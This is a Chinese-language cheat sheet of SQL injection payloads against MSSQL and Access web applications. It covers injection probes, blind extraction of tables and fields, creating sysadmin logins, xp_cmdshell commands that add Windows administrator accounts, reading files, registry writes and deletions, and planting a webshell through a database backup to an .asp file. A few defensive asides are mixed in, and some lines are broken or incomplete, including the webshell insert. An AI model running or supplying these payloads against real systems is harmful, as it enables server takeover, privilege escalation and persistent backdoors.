1.判断是否有注入;and 1=1 ;and 1=2
2.初步判断是否是mssql ;and user>0

3.注入参数是字符'and [查询条件] and ''='

4.搜索时没过滤参数的'and [查询条件] and '%25'='

(注:以上判断都依赖应用把参数直接拼接进SQL语句;改用参数化查询后,这些探测不再生效。)
5.判断数据库系统

;and (select count(*) from sysobjects)>0 mssql

;and (select count(*) from msysobjects)>0 access

6.猜数据库 ;and (select Count(*) from [数据库名])>0

7.猜字段 ;and (select Count(字段名) from 数据库名)>0

8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0

9.(1)猜字段的ascii值(access)

;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

(2)猜字段的ascii值(mssql)

;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

10.测试权限结构(mssql)

;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--

;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--

;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--

;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--

;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--

;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--

;and 1=(select IS_MEMBER('db_owner'));--

(注:Web应用使用的数据库登录不应属于上述任何服务器角色,也不应是db_owner;按最小权限只授予所需对象的权限。)

11.添加mssql和系统的帐户

;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--

;exec master.dbo.sp_addsrvrolemember sysadmin username;--

;exec master.dbo.xp_cmdshell 'net user username password

/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--

;exec master.dbo.xp_cmdshell 'net user username password /add';--

;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--

(注:xp_cmdshell自SQL Server 2005起默认禁用,默认只有sysadmin成员可以执行;应审计sp_configure的变更以及登录、服务器角色成员和本地管理员组成员的新增。)

12.(1)遍历目录

;create table dirs(paths varchar(100), id int)

;insert dirs exec master.dbo.xp_dirtree 'c:\'

;and (select top 1 paths from dirs)>0

;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)

(2)遍历目录

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器

;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表

;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构

;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容

13.mssql中的存储过程

xp_regenumvalues 注册表根键, 子键

;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值

xp_regread 根键,子键,键值名

;exec xp_regread

'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回指定键的值

xp_regwrite 根键,子键, 值名, 值类型, 值

值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型

;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表

xp_regdeletevalue 根键,子键,值名

exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值

xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值

(注:这些xp_reg*扩展存储过程没有正式文档;应收回public和应用帐户对它们的执行权限,并让SQL Server服务以低权限帐户运行。)

14.mssql的backup创建webshell

use model

create table cmd(str image);

insert into cmd(str) values ('');

backup database model to disk='c:\l.asp';

(注:BACKUP DATABASE需要sysadmin、db_owner或db_backupoperator权限;SQL Server服务帐户不应对Web目录有写权限。)

15.mssql内置函数

;and (select @@version)>0 获得Windows的版本号

;and user_name()='dbo' 判断当前系统的连接用户是不是sa

;and (select user_name())>0 爆当前系统的连接用户

;and (select db_name())>0 得到当前连接的数据库

(注:@@version返回的是SQL Server的版本字符串,其中附带操作系统信息;user_name()为dbo只说明当前登录映射为数据库所有者,不一定就是sa。这些语句依靠类型转换错误的回显取得数据,不向客户端输出详细数据库错误即可减少泄露。)

16.简洁的webshell

use model

create table cmd(str image);

insert into cmd(str) values ('');

backup database model to disk='g:\wwwtest\l.asp';